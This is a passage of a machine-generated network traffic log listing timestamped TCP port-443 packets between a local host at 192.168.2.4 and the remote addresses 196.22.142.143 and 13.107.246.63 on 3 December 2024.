                                                                                                                      Dec 3, 2024 08:55:27.200223923 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.200243950 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:27.223330021 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.246169090 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:27.246185064 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.432760954 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.437196970 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.437221050 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.437727928 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.437733889 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.452218056 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.453170061 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.453208923 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.453641891 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.453649044 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.469750881 CET4434989113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.469819069 CET4434989113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.469944000 CET49891443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.470196009 CET49891443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.470221996 CET4434989113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.470242977 CET49891443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.470248938 CET4434989113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.473144054 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.473192930 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.473293066 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.473448038 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.473455906 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.637891054 CET4434989213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.637969017 CET4434989213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.638076067 CET49892443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.742913961 CET49892443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.742937088 CET4434989213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.742960930 CET49892443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.742965937 CET4434989213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.769737959 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.769782066 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.769855976 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.770301104 CET49909443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.770314932 CET4434990913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.886970997 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.887046099 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.887294054 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.887330055 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.887350082 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.887404919 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.887411118 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.890372038 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.890414953 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.890484095 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.890634060 CET49910443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.890645027 CET4434991013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.911746979 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.911775112 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.911825895 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.911870003 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.911894083 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.912166119 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.912184000 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.912189007 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.912194014 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.915112972 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.915134907 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:27.915208101 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.915368080 CET49911443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:27.915376902 CET4434991113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.005013943 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.005043030 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.005110979 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.005130053 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.032452106 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.032480001 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.032536983 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.032552958 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.032768011 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.032819033 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.033514977 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.033536911 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.056761026 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.241266012 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.241276979 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.241338015 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.257168055 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.257177114 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.257234097 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.260077000 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.263014078 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.263042927 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.264139891 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.264210939 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.264590025 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.264667988 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.264770031 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.264776945 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.275274038 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.275333881 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.284626007 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.284846067 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.284858942 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.285792112 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.285845041 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.286194086 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.286253929 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.286434889 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.286441088 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.293509007 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.293567896 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.301084995 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.301296949 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.301325083 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.302314997 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.302371979 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.302665949 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.302712917 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.302805901 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.302812099 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.307954073 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.324320078 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.324533939 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.324562073 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.325582981 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.325632095 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.326545954 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.326616049 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.326689959 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.326697111 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.338867903 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.348927975 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.349143028 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.349152088 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.349158049 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.349298954 CET49899443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.349306107 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.349603891 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.349992990 CET49899443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.350037098 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.350157976 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.350178957 CET49899443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.350205898 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.350449085 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.350500107 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.350528955 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.354212999 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.370832920 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.395318985 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.395319939 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.401187897 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.401192904 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.415361881 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.415579081 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.415586948 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.416584969 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.416644096 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.417363882 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.417426109 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.417519093 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.417525053 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.422801018 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.423286915 CET49905443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.423296928 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.423816919 CET49905443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.423820972 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.449278116 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.463723898 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.481756926 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.482014894 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.482024908 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.483078957 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.483129025 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.483834028 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.483895063 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.484088898 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.484096050 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.485369921 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.485438108 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.487919092 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.487972021 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.487977982 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.488019943 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.488421917 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.488440037 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.499205112 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.499241114 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.499737978 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.500247002 CET49915443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.500260115 CET44349915196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.524980068 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:28.867038012 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.867101908 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.867155075 CET49905443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.867510080 CET49905443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.867527008 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.867537022 CET49905443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.867542982 CET4434990513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.907218933 CET49918443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.907263041 CET4434991813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:28.907331944 CET49918443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.908446074 CET49918443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:28.908458948 CET4434991813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.095676899 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.095698118 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.095706940 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.095947981 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.095969915 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.117413044 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.117435932 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.117444038 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.117466927 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.117542982 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.117563963 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.117588043 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.142241955 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.142261028 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.142267942 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.142291069 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.142345905 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.142375946 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.142404079 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.144740105 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.144999027 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.145009041 CET44349901196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.145040035 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.145162106 CET49901443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.150456905 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.167382956 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.167399883 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.167407036 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.167493105 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.167505980 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.167685986 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.204823971 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.204845905 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.204888105 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.204927921 CET49899443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.204932928 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.207420111 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.207443953 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.207451105 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.207477093 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.207510948 CET49899443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.207793951 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.207803965 CET44349902196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.209367990 CET49899443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.209378958 CET44349899196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.213495970 CET49903443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.232666016 CET49919443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.232691050 CET44349919196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.232784986 CET49919443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.233349085 CET49919443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.233361006 CET44349919196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.234885931 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.234911919 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.234994888 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.235019922 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.236752033 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.239059925 CET49906443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.239059925 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.239073992 CET44349906196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.239088058 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.239263058 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.239444017 CET49920443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.239456892 CET44349920196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.240756035 CET49921443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.240777016 CET44349921196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.240959883 CET49921443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.241183043 CET49921443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.241198063 CET44349921196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.261022091 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.261411905 CET49902443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.263724089 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.263737917 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.264283895 CET49908443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:29.264287949 CET4434990813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.331083059 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.331111908 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.331120014 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.331414938 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.331430912 CET44349907196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.338601112 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.338614941 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.338641882 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.338726044 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.338726044 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.352601051 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.352608919 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.352703094 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.352756977 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.352869034 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.353147030 CET49900443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.353154898 CET44349900196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.357801914 CET49923443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.357806921 CET49924443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.357815981 CET44349923196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.357839108 CET44349924196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.357903004 CET49923443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.358087063 CET49924443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.358392000 CET49924443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.358402967 CET44349924196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.358773947 CET49923443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.358787060 CET44349923196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.360677958 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.360691071 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.360713959 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.360745907 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.360801935 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.374947071 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.374955893 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.375072002 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.386253119 CET49907443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.396493912 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.396501064 CET44349904196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.396632910 CET49904443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:29.412091017 CET44349903196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:29.412098885 CET44349903196.22.142.143192.168.2.4
